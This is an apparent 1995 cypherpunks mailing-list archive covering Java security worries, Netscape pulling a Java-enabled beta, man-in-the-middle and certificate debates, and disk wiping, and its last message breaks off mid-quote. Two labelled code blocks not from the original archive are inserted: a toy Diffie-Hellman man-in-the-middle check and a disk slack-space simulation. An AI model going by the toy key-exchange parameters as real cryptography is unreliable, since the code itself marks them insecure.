In-Reply-To: <199510092322.TAA24567@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951009171543.13562H-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Oct 1995, Perry E. Metzger wrote:

[ I just got Man-On-The-Street'ed by a TV news crew asking my opinion of 
  the OJ Verdict, I'm entitled to a little Side-Bar 

> Sendmail is about 29K lines of C code -- not significantly larger by
> my standards -- and has proven nearly impossible to secure.

Hey - but sendmail was designed to be Z-1 secure - formally proven to be 
unsecurable :-)

> taken on an impossible task. Marcus Ranum has noted that you can't
> trust a program that's bigger than a couple of pages long, and I

For the general case this is true. To be able to trust larger systems, you
need to not only be able to trust the individual 2 pagers, but to also be
able to show that composing the sub units doesn't lose whatever property
you're trying to do. The architecture of the system needs to be designed
with this in mind; otherwise reasoning about the composite becomes
intractable. There are all sorts of things you can do to make analysis
easier - eliminating global state, etc. Retrofitting security or 
verifiability never works. 

Distributed co-operative theorem proving, anyone?

END-DIGRESSION]

Real point of the message:

In my previous message, I left out some fundamental parts of the run-time 
that need to be looked at carefully. The garbage collection needs to be 
examined carefully. Normally GC algorithms are formally derived, so it's 
the implementation that needs to be checked for. Holes in the GC may be 
too unpredictable to exploit for anything but core-dumping, especially since 
Java uses a mark-sweep conservative collector. 

A more promising area of attack might be the Thread system. If the thread
system can be confused, it might be possible to have an untrusted app
start executing in the context of a trusted thread. This may or may not 
be exploitable, depending on how much of the untrusted thread's context 
gets held over (call stack, etc), but could be fun if it works.

Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: P.Peterson@itd.uts.edu.au (Paul Peterson)
Date: Mon, 9 Oct 95 00:41:52 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Netscape 2.0 beta
Message-ID: <v02110102ac9e7e3b993f@[138.25.32.103]>
MIME-Version: 1.0
Content-Type: text/plain


Patrick J. Horgan <patrick@verity.com> wrote:
>Steven Champeon said:
>
>> One thing that I found with the newsreader was that it doesn't
>> do POP correctly. No matter what you do with your mail, it still
>> doesn't check for read vs. unread articles. This is fine when you
>> have a mailbox with one message. It can be annoying when you have
>> 110 messages in your mailbox and don't want to 1) delete them or
>> 2) download them twice.
>
>Neither pop 2 nor pop 3 tell you whether you've read a message or not.

        Eudora can tell whether you've read a message or not by reading the
'status' line of a message. The status line contains an "R" if the message
has been previously read. Eudora uses POP 3 I believe. Elm also uses the
'status' line. The upshot of this is that you can configure Eudora to leave
your mail on the server and next time Eudora goes to read your mail, it
ignores all previously read messages and only downloads the new ones.

>pop 2 does bump up the current number with an ACKS, but if you move around
>with READ n, then that's useless.  pop 3 doesn't do that.
>
>I just reread the rfcs to make sure that I wasn't missing anything,
>(RFC 1725: Post Office Protocol - Version 3, RFC 937: Post Office Protocol -
>Version 2).  Am I missing something?

        This may or may not be a part of the RFC's (I haven't read them)
but this is the way I've always seen it work. So there's no reason that
Netscape couldn't do the same if it can't already. I can't tell yet whether
it's capable or not as I'm still downloading version 2.0b as I type. :-)

Cheers,
Paul P.

--
 _--_|\  Paul Peterson,                              P.Peterson@itd.uts.edu.au
/      \ Systems Programmer,                                Ph: +61 2 330 2131
\_.--._/ University of Technology, Sydney,                   (Internal: x2131)
      v  PO Box 123, Broadway, NSW, 2007, Australia.       Fax: +61 2 330 1994






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 9 Oct 95 17:57:43 PDT
To: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Subject: Re: java security concerns
In-Reply-To: <9510100030.AA29195@pepper.Eng.Sun.COM>
Message-ID: <199510100051.RAA03799@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Perry:
>By the way, I suggest that Sun should offer a large money prize for
>the first significant security hole found in the Java implementation. It's
>a tiny price to pay for security.


Chuck:
> I don't think the lawyers would let us. 
> 

	This is a shame. What reason would they have for not letting
you? It could well be a very good marketing move. Maybe your marketing
dept can convince the legal dept.

> Would anyone be interested in a Java daemon that one could send arbitrary
> classes to in an attempt to subvert the runtime? I once thought this would
> be a good way to give safe exposure to the system in general. You know sort
> of "here's a program that can feed classes to a Java runtime on a system
> which is known to have a file X on it. Try to return the contents of X."
> 
> It probably wouldn't be too useful beyond that, and it would only validate
> the classes you have access to, not necessarily the full set in a release.
> (hence my not doing it given its utility only in testing the core runtime)
> 

	That, and a cash reward for getting the contents would be even
better. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 9 Oct 95 16:03:45 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certificate proposal
In-Reply-To: <199510092038.NAA09612@jobe.shell.portal.com>
Message-ID: <199510092303.TAA24560@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>Try to think of it not in relativistic or epistemological terms, but
>rather look at it in terms of reality.  The real world exists, and in it
>exist real people.  We can agree on this much, right?  Two of these
>people want to communicate securely.  That is not such a stretch of the
>imagination, is it?  By "communicate securely" I mean they exchange
>information in such a way that other people don't receive it.

>Now surely it is clear that with this definition of the problem,
>approaches which redefine people to mean people+eavesdroppers are not
>responsive.  Perhaps the motivation to do so is simply the belief that
>the problem is not solvable as stated.  If so, I'd like to hear someone
>say this.

This whole issue is a philosophical one.  The issue is the "ontology"
of electronic relationships.  The argument presented is analogous to
the "Turing test" for artificial intelligence.  The MITM is relevant
only where two communicating parties share no channels which the MITM
doesn't control, otherwise they exchange one secret over such a channel
and Mitch is hosed (with probability 1/2^h, where h is the entropy of
the secret).

Now, if Alice communicates with an entity she knows as "Bob", which in
"reality" is Bob filtered by Mitch, I think we can readily agree that
Alice probably cannot communicate securely with Bob.  She *can*,
however, communicate in perfect secrecy with "Bob" -- the amalgamation
of Bob and Mitch.  The ontological issue comes about when we ask who it
is with whom Alice *wants* to communicate.  I'd maintain that Bob has
no ontological status with Alice.  She knows nothing of Bob, only of
"Bob".  Therefore, she must be intending to communicate with "Bob", and
her communication is secure.

An entity cannot have a meaningful ontological status until some
communication occurs.  The status which results from the communication
is "the entity, calling itself Bob, with whom I communicated over
channel X".  When a second communication occurs, we may have "the
entity, calling itself Bob, with whom I communicated over channel Y".
If the second communication contains an authenticating transaction,
then we can note that the two entities are the same.  This is what we
really mean by authentication, anyway.

As long as Mitch is successful in his MITM attack, then Bob is not an
entity with respect to Alice.

If Alice finds a key that purports to belong to Bob, about whom she
previously knows nothing, what possible relevance can it have whether
it really belongs to Bob or to "Bob" --- there is nothing in Alice's
mind to distinguish the two.

If Alice finds a key that purports to belong to Carol, about whom she
knows something, then she must execute an authentication protocol with
the new key to verify that the entity with whom it permits
communication is actually Carol, and not "Carol".

Identifying the key with the person is entirely reasonable, if the key
is what introduced the person to you (and thus ontologically created
the entity).  If the introduction happens prior to receiving the key,
then authentication becomes necessary to avoid MITM.
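
An added illustration, not part of the message above or of the list archive: a toy Diffie-Hellman exchange, the protocol this thread cites as open to MITM, in which a secret passed over a channel Mitch does not control is used to tag each side's view of the exchange, so a substituted key is detected. The group parameters, function names and the 128-bit secret are assumptions of this sketch; the secret must be high-entropy, since a short one could be guessed offline from an observed tag.

```python
import hashlib
import hmac
import secrets

# Toy group, for illustration only: 2**127 - 1 is prime but unsuitable for real use.
P = 2**127 - 1
G = 3


def keypair():
    """Return (private exponent, public value G^x mod P)."""
    priv = secrets.randbelow(P - 3) + 2
    return priv, pow(G, priv, P)


def _b(n):
    return n.to_bytes(16, "big")


def tag(oob_secret, sender, initiator_pub, responder_pub, session_key):
    """HMAC over one party's view of the exchange, keyed with the out-of-band secret."""
    view = sender + _b(initiator_pub) + _b(responder_pub) + _b(session_key)
    return hmac.new(oob_secret, view, hashlib.sha256).digest()


def run_exchange(oob_secret, mitch_present):
    a_priv, a_pub = keypair()   # Alice, the initiator
    b_priv, b_pub = keypair()   # Bob, the responder
    m_priv, m_pub = keypair()   # Mitch, who controls the main channel

    # What each side receives as "the other party's" public value.
    bob_sees = m_pub if mitch_present else a_pub
    alice_sees = m_pub if mitch_present else b_pub

    k_alice = pow(alice_sees, a_priv, P)
    k_bob = pow(bob_sees, b_priv, P)

    # Session keys Mitch can derive from the public values he intercepted.
    mitch_keys = {pow(a_pub, m_priv, P), pow(b_pub, m_priv, P)}

    # Each side sends a tag over its own view. Mitch can relay the tags but,
    # without oob_secret, cannot recompute them for the views he created.
    tag_a = tag(oob_secret, b"alice", a_pub, alice_sees, k_alice)
    tag_b = tag(oob_secret, b"bob", bob_sees, b_pub, k_bob)

    # Each side recomputes the tag it expects from the peer, using its OWN view.
    bob_accepts = hmac.compare_digest(
        tag_a, tag(oob_secret, b"alice", bob_sees, b_pub, k_bob))
    alice_accepts = hmac.compare_digest(
        tag_b, tag(oob_secret, b"bob", a_pub, alice_sees, k_alice))

    return {
        "keys_match": k_alice == k_bob,
        "mitch_reads_traffic": k_alice in mitch_keys and k_bob in mitch_keys,
        "alice_accepts": alice_accepts,
        "bob_accepts": bob_accepts,
    }


if __name__ == "__main__":
    shared = secrets.token_bytes(16)   # exchanged once, out of band
    print("honest  :", run_exchange(shared, mitch_present=False))
    print("attacked:", run_exchange(shared, mitch_present=True))
```

Without the tag comparison, both runs complete and look identical to Alice and Bob; the only difference is that in the second one Mitch holds both session keys.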




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 16:11:29 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: Certificate proposal
In-Reply-To: <9510092114.AA24726@alpha>
Message-ID: <9510092311.AA27677@alpha>
MIME-Version: 1.0
Content-Type: text/plain



aba@atlas.ex.ac.uk writes:
 > Now the puzzling stuff is people who appear to be arguing that MITM is
 > unimportant

Hal said this same thing in a recent note.  For myself, I've never
meant to argue that the MITM threat is unimportant.  I've simply
contended that you're no more vulnerable to it in the key-as-True-Name
scenario than with a certificate-bound key-to-name relationship
system.  If you assume an MITM could thwart the establishment of trust
in the first case, then I guess I posit that the same energies could
with equivalent hope for success be directed in an attack on a more
"traditional" certificate scheme.

 > Perhaps the view is based on the fact that there are plenty of
 > situations where you don't care what an entity's name is, and hence
 > the attribute which should be under discussion is credit worthiness,
 > or reliability, but still you need to protect against MITM, using
 > whatever channels and means available.  I don't see how this alters
 > the argument.

And this is where I start to think we're all in agreement even though
there's an argument going on!  Yes, I think you need to protect
against MITM attacks by whatever means are available.  I think that no
matter what you do, if you're strictly relying on communications
systems over which you ultimately have no control (if at some point
somebody you simply have to trust on faith inevitably gets his hands
on your bits), then you have to put up with a non-zero probability of
being victimized by a MITM attack.  If you're willing on blind faith
to trust certificates granted by some authority, you're fooling
yourself (I claim).  If you only trust that authority because it fits
into an established web, then I don't see why there's any need for a
certificate binding a public key to some "True Name" constant; what's
the point?  (How do you know the alleged True Name has any meaning in
the first place?)

I also posit that this is not really any different than the problems
of social interaction homo sapiens have been dealing with ever since
they grunted their way into cooperative tribal life.


[ I kinda wish somebody with more of a clue than I have would support
me or tell me to shut up :-]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Miller <gmiller@grendel.ius.indiana.edu>
Date: Mon, 9 Oct 95 15:00:18 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Java
In-Reply-To: <199510090017.UAA00652@jekyll.piermont.com>
Message-ID: <Pine.3.89.9510091807.A8324-0100000@grendel.ius.indiana.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 8 Oct 1995, Perry E. Metzger wrote:

> 
> As long as people are mentioning Java, I just want to make the
> prediction, one more time, that at some point someone is going to find
> some devastating security holes in HotJava.

	I'd like to make this prediction:  someone at some point in time 
will find another serious security hole in SendMail.

	What you need to ask yourself is "Do the benefits of Java 
outweigh the security risks?"

greg.miller@shivasys.com
http://www.ius.indiana.edu/~gmiller/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Mon, 9 Oct 95 15:22:56 PDT
To: cypherpunks@toad.com
Subject: Re: PC disk wipe software
Message-ID: <199510092220.SAA19341@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510091318.JAA24166@jekyll.piermont.com>, perry@piermont.com
("Perry E. Metzger") wrote:

> I thought I'd ask here, since its related to a lot of the stuff people
> have written for the PC platform in these parts. I need to securely
> wipe a bunch of data from an MS-DOS hard drive, so that it can't be
> recovered. Are there any readily available utilities for this? Will
> any of them selectively erase only data that isn't allocated to
> existing files?

Whatever you use, check its claims with a disk editor. None of the various
wipe utilities for the Mac that I am aware of (Norton, Burn) work as
advertized. They all invariably fail to wipe the slackspace at the end of
allocated, but not fully used blocks. Consequently, several kB of data
left behind in said slackspace by previously deleted files will be missed
on your average drive.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHmgGioZzwIn1bdtAQFEsQF8CYfksEosFfBJoQckOM390b7CBeupCtrf
T2Var/yEUwuT5lxH7xJ6y9p69wfaljtz
=Hkkv
-----END PGP SIGNATURE-----
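
An added illustration, not part of the message above: the slack-space check it recommends doing with a disk editor, automated over a constructed disk image. The image layout, cluster size, file table and function names are assumptions of this sketch (contiguous files, no real FAT parsing); `wipe_free_clusters` models a wiper that only clears unallocated clusters.

```python
CLUSTER = 2048  # bytes per allocation unit in the constructed image

# Constructed file table: name -> (first cluster, length in bytes).
FILES = {"A.TXT": (0, 3000), "B.DAT": (3, 2048), "C.DOC": (5, 100)}


def clusters_needed(length, cluster=CLUSTER):
    return -(-length // cluster)  # ceiling division


def slack_range(first_cluster, length, cluster=CLUSTER):
    """[start, end) byte offsets between a file's last data byte and the end of its last cluster."""
    start = first_cluster * cluster + length
    end = (first_cluster + clusters_needed(length, cluster)) * cluster
    return start, end


def allocated(files, cluster=CLUSTER):
    used = set()
    for first, length in files.values():
        used.update(range(first, first + clusters_needed(length, cluster)))
    return used


def wipe_free_clusters(image, files, cluster=CLUSTER):
    """Model of a wiper that zeroes only clusters not allocated to any file."""
    used = allocated(files, cluster)
    for c in range(len(image) // cluster):
        if c not in used:
            image[c * cluster:(c + 1) * cluster] = bytes(cluster)


def wipe_slack(image, files, cluster=CLUSTER):
    """Zero the slack of every allocated file without touching file data."""
    for first, length in files.values():
        start, end = slack_range(first, length, cluster)
        image[start:end] = bytes(end - start)


def residue(image, files, cluster=CLUSTER):
    """Count non-zero bytes left in free clusters and in each file's slack."""
    used = allocated(files, cluster)
    free = sum(
        sum(1 for b in image[c * cluster:(c + 1) * cluster] if b)
        for c in range(len(image) // cluster) if c not in used
    )
    slack = {}
    for name, (first, length) in files.items():
        start, end = slack_range(first, length, cluster)
        slack[name] = sum(1 for b in image[start:end] if b)
    return {"free": free, "slack": slack}


def build_image(n_clusters=8):
    """Image full of stale data from deleted files, with live files written over it."""
    image = bytearray(b"OLD!" * (n_clusters * CLUSTER // 4))
    for first, length in FILES.values():
        off = first * CLUSTER
        image[off:off + length] = b"L" * length
    return image


def demo():
    image = build_image()
    before = residue(image, FILES)
    wipe_free_clusters(image, FILES)
    after_free_wipe = residue(image, FILES)
    wipe_slack(image, FILES)
    after_slack_wipe = residue(image, FILES)
    intact = all(image[f * CLUSTER:f * CLUSTER + n] == b"L" * n
                 for f, n in FILES.values())
    return before, after_free_wipe, after_slack_wipe, intact


if __name__ == "__main__":
    for label, report in zip(("before", "free-cluster wipe", "slack wipe"), demo()):
        print(f"{label:>18}: {report}")
```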




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 9 Oct 95 16:25:16 PDT
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Certificate proposal
In-Reply-To: <199510092038.NAA09612@jobe.shell.portal.com>
Message-ID: <9510092324.AA28153@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Scott Brickner writes:
 > [ ... a bunch of stuff I have no quarrel with ... ]
 >
 > Identifying the key with the person is entirely reasonable, if the key
 > is what introduced the person to you (and thus ontologically created
 > the entity).

Right (sez me).

 > If the introduction happens prior to receiving the key,
 > then authentication becomes necessary to avoid MITM.

Maybe I'm not sure what good a "true name" certificate is going to do
me in establishing confidence in a key.  How will I know that the
MITM attack didn't begin with the "true name" registration?

(Note that I continue to insist that I very well might be totally
without clue here, so correct me brutally if applicable.)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 18:14:27 PDT
To: cypherpunks@toad.com
Subject: Man in the Middle Revisited (but not for the last time)
Message-ID: <ac9ec6b5070210049d4b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:03 PM 10/9/95, Hal wrote:
>tcmay@got.net (Timothy C. May) writes:
>>For communication, the only credential Alice needs to ensure that only Bob
>>can read her message is that she uses Bob's public key. If "Bob the Key"
>>reads it, presumably it was "Bob the Person" who read it.
>
>>(Again, Bob the Key = Bob the Person to many of us. If Bob the Person has
>>let his private key out, so that Chuck the Person is also able to read the
>>Bob the Key stuff, etc., then of course cryptography cannot really handle
>this situation.)
>
>OK, but again, what about the man in the middle attack?  Suppose the
>key that you found that claims to be from Bob is actually not his, but
>another one created by a man in the middle, such as Bob's malicious
>ISP?  Then that ISP is decrypting the messages Alice sends to him using
>that fake key, and re-encrypting them using Bob's real key.  He is
>reading all of the messages, and Alice and Bob do not in fact have
>communications privacy.

There are many, many people on the list that I know only from their posts
and their public keys (not that I'm a heavy user of PGP as some of you are,
though some of you I have dealt with via PGP messages).

I don't know if "Carl Ellison the Key" is "really" the same Carl Ellison
that Carl Ellison the Key claims to be...you see the semantic difficulties.


What I know is that the Carl Ellison who sends me PGP messages and who
appears to be working at TIS is not publicly disputing messages sent by
an MITM attacker. (True, the MITM could be only targeting _me_, and so the
"real" Carl Ellison could be unaware that the "fake" MITM Carl Ellison is
masquerading as him.)

But if I really care I can post a public channel (the CP list, for example)
query, encrypted to the known public key (used in many past posts, for
example) of "Carl Ellison the Key," asking if he sent the message to me.

To put it bluntly, all I really care about is _persistent_ key-holding,
i.e., that the person who began posting with a given key is still using the
same key. Or, rather, I don't even care if the keyholder "Pr0duct Cypher"
is actually a person, or a Bourbaki-style committee--I only care that
messages purporting to be from Pr0duct Cypher or Black Unicorn or Carl
Ellison are still using the same key.

Who any of these entities "really" are is irrelevant to me. (I don't even
know if Hal Finney, who I met once a few years ago, is the "real" Hal
Finney, nor do I really care.)


>I don't want to overstate the risk of this attack.  It would not be an
>easy one to mount and I believe there are countermeasures which could
>detect it unless the MITM had nearly supernatural powers.  But the MITM
>attack is normally considered seriously in discussing crypto protocols.
>It is a well known weakness in Diffie-Hellman, for example.  That is why
>authenticated Diffie Hellman is used in some of the newly proposed key
>exchange protocols for IP.  The risks of MITM attacks on public key
>systems was recognized not long after those systems were proposed.  The
>problems with fake keys have been discussed for over a decade.
>
>Why is this all suddenly irrelevant?  Were these attacks never realistic?
>Is it just not a problem somehow?  I am baffled by the fact that people
>are just turning their backs on all these years of research and
>experience.  If this is some kind of paradigm shift in which the idea of
>communicating with keys is seen as the key to the puzzle, then I am
>afraid I don't share the enlightenment.  To me the problem seems as real
>as ever.

Well, I'm not saying the work is unimportant. What I'm saying--and I think
others are too--is that there is no crisis that calls for "certificate
authorities" to provide "proof" that a keyholder is who he says he is.

I'm happy continuing to trust that people are who I once thought they
were, by their signatures and their apparent ability to read messages
encrypted to their public key. If in fact I am dealing with body-snatchers
who actually infiltrated the identity of "Carl Ellison" and are able to act
as him, so what?

I never met the "real" Carl Ellison, so who cares if Carl Ellison the Key
is really Carl Ellison the Biological Entity who Grew up in Foobar,
Pennsylvania and Graduated from Bobby Ray Inman H.S. in 1975?

That's all. If people want to work on credentials and similar certificate
processes, that's great.

But I'm saying I see no compelling need _for myself_ and will strongly
argue against some of the reasoning we are hearing about why certificates
need to be issued. (Because I have also read the Postal Service proposals
that they get into the business of certification of e-mail in various ways,
and because of the various other schemes being discussed which seem less
than voluntary.)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Reich <Richard_Reich@reich.com>
Date: Mon, 9 Oct 95 18:46:16 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Java bugs found?
In-Reply-To: <199510100042.UAA24769@jekyll.piermont.com>
Message-ID: <199510100145.SAA00403@lux.reich.com>
MIME-Version: 1.0
Content-Type: text/plain


After I noticed the file had been pulled, I recovered its contents from my 
netscape cache (thanks, netscape!):

  Netscape was notified on Sunday 10/8/95 by Sun Microsystems that there
is a serious security hole in their Java system that we are including in
some Beta Test versions of Netscape Navigator 2.0.  We are removing all
Java enabled Navigator Beta distributions from our FTP site until we can
address this problem.  The affected versions are 32-Bit Windows, Sun Unix,
and SGI Unix.  Thank you for your patience.

> 
> Anyone from Netscape care to comment?
> 
> ------- Forwarded Message
> 
> Date: Mon, 09 Oct 95 14:12:41 -0400
> From: Andrew Wason <aw@bae.bellcore.com>
> To: java-interest@java.sun.com
> Subject: Re: Netscape 2.0b1 for Win95
> 
> Terence Chr Haddock <haddock@UDel.Edu>  writes:
> >
> >       Where is the 32-bit version of Netscape2.0? I can only find the
> > 16-bit. This may be because I have only been able to get on ftp4,ftp5,
> > and not ftp.netscape.com. Sorry if this is a stupid question.
> 
> Netscape pulled all the 2.0 betas that supported Java yesterday,
> due to a recently discovered Java security hole.  So the 32 bit
> Windows versions, SunOS, Solaris and SGI versions were removed.
> There was a README explaining this there last night, but I can't
> find it today.
> 
> Andrew
> 
> _______________________________________________________________________________
> 
> Andrew Wason                                       Bell Communications Research
> aw@bae.bellcore.com                                Piscataway, NJ
> - -
> Note to Sun employees: this is an EXTERNAL mailing list!
> Info: send 'help' to java-interest-request@java.sun.com
> 
> 
> ------- End of Forwarded Message
> 

-- 
Richard Reich / Internet Consulting / +1 415 668 3311
... and that things are not so ill with you and me as they might
have been, is half owing to the number who lived faithfully a hidden
life, and rest in unvisited tombs.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 9 Oct 95 18:35:16 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <ac9f1a0e0a0210043250@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I agree with the points Jon Lasser makes, whether or not we have the same
political point of view.

At 8:37 PM 10/9/95, Jon Lasser wrote:

>I'm not a libertarian, or an anarcho-capitalist.  I do, however, support
>rapid deployment, without restrictions, of strong crypto.  Here's why:
>
>(1) It is impossible to stop these technologies; someone on the list
>recently reminded us that a bright fourteen year old could reproduce the
>basic functionality of PGP in a brief period of time.  The mathematics
>of, say, RSA, are fairly basic.  I think it's unreasonable to outlaw
>multiplication of prime numbers, don't you?

I agree with this, but we have to be careful. Consider this parallel:

"It is impossible to stop people from having high-power sniper rifles.
Anyone can shoot people from afar with relative safety. I think it's
unreasonable to outlaw use of high power rifles for assassinations, don't
you."

(I'm not making an argument for gun control, just citing a parallel--one of
many I can think of--where just because something is easy to circumvent
does not mean that it shouldn't be outlawed.)

>(2) While these technologies allow people to violate the law, I have
>enough faith in humanity to believe that civilization won't collapse as a
>result.  There have always been criminals, and there have always been
>revolutionaries.  Only recently has "The State" been able to suppress
>these forces without maintaining a physical presence.  Crypto merely
>returns us to that default.

Agreed. Although it does allow certain new markets to be efficiently
developed that could not develop otherwise.

>(3) These technologies also allow honest, law-abiding citizens to protect
>themselves from criminals, both within and outside the government.
>Industrial espionage can be defeated through strong crypto, for example.
>J. Edgar Hoover would have been powerless to harass Martin Luther King,
>Jr. had MLK had access to strong crypto.

This is a good point to stress.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Mon, 9 Oct 95 16:52:11 PDT
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Certificate proposal
In-Reply-To: <9510092311.AA27677@alpha>
Message-ID: <199510092351.TAA25651@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally writes:
>
>aba@atlas.ex.ac.uk writes:
> > Now the puzzling stuff is people who appear to be arguing that MITM is
> > unimportant
>
>Hal said this same thing in a recent note.  For myself, I've never
>meant to argue that the MITM threat is unimportant.  I've simply
>contended that you're no more vulnerable to it in the key-as-True-Name
>scenario than with a certificate-bound key-to-name relationship
>system.  If you assume an MITM could thwart the establishment of trust
>in the first case, then I guess I posit that the same energies could
>with equivalent hope for success be directed in an attack on a more
>"traditional" certificate scheme.

I disagree.  The MITM is foiled by one successful communication.  The
reason for certificates is to isolate and limit the number of
authentication transactions which are not automated.

When you get your key certified you go through some sort of
very-hard-to-subvert process.  The exact process is irrelevant, as it
merely affects the trustworthiness of the certifier.  Let's assume for
the sake of argument that the key is certified by the same organization
(DMV/MVA/DPS/whatever) that issues drivers licences, and on the same
identification criteria.  When you have your key certified, you also
get a copy of the KCA's key.  You now have enough information to
authenticate to roughly the same level as presentation of a state
issued ID card.  After the first transaction, you can accept any
key *signed* by the KCA under the same circumstances you'd accept
the id card.  But you can get KCA signed keys from almost *anywhere*,
without the overhead associated with that level of authentication.

The expensive authentication happens once, followed by a nearly
unlimited number of cheap ones.

> > Perhaps the view is based on the fact that there are plenty of
> > situations where you don't care what an entity's name is, and hence
> > the attribute which should be under discussion is credit worthiness,
> > or reliability, but still you need to protect against MITM, using
> > whatever channels and means available.  I don't see how this alters
> > the argument.
>
>And this is where I start to think we're all in agreement even though
>there's an argument going on!  Yes, I think you need to protect
>against MITM attacks by whatever means are available.  I think that no
>matter what you do, if you're strictly relying on communications
>systems over which you ultimately have no control (if at some point
>somebody you simply have to trust on faith inevitably gets his hands
>on your bits), then you have to put up with a non-zero probability of
>being victimized by a MITM attack.  If you're willing on blind faith
>to trust certificates granted by some authority, you're fooling
>yourself (I claim).  If you only trust that authority because it fits
>into an established web, then I don't see why there's any need for a
>certificate binding a public key to some "True Name" constant; what's
>the point?  (How do you know the alleged True Name has any meaning in
>the first place?)
>
>I also posit that this is not really any different than the problems
>of social interaction homo sapiens have been dealing with ever since
>they grunted their way into cooperative tribal life.

I think we're still "arguing past each other."

One side seems to argue "people have keys, and we need a way to
authenticate them".  The other seems to argue "there are situations
where we don't care about the people behind the keys."

Both are correct.  As I said before, authentication is the correlation
of entities with whom you've communicated over different channels.  The
notion that "people have keys" sort of implies that you know something
about the "people".  This really means you've communicated with them
out-of-band --- even if you've just heard about them, it's a few bits
of information.  When you finally communicate in-band, you need an
authentication protocol to correlate the entity on the other end of the
current channel with the entity you have in mind.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 9 Oct 95 16:06:02 PDT
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: netscape mail starts java attachments upon get new mail...
In-Reply-To: <LAA00780.199510091552@garotte.va.pubnix.com>
Message-ID: <199510092305.TAA24544@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Josh M. Osborne" writes:
> As far as I know Java apps can only make network connections to the
> IP address they were loaded from.

That might be the design, but we know that it is hard to faithfully
implement very complicated designs.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Mon, 9 Oct 95 16:07:03 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510092038.NAA09612@jobe.shell.portal.com>
Message-ID: <9510092306.AA04357@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal said:
> Try to think of it not in relativistic or epistemological terms, but
> rather look at it in terms of reality.  The real world exists, and in it
